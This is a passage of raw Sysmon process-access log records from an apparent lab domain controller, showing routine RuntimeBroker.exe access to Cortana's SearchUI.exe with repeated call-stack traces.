ws\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 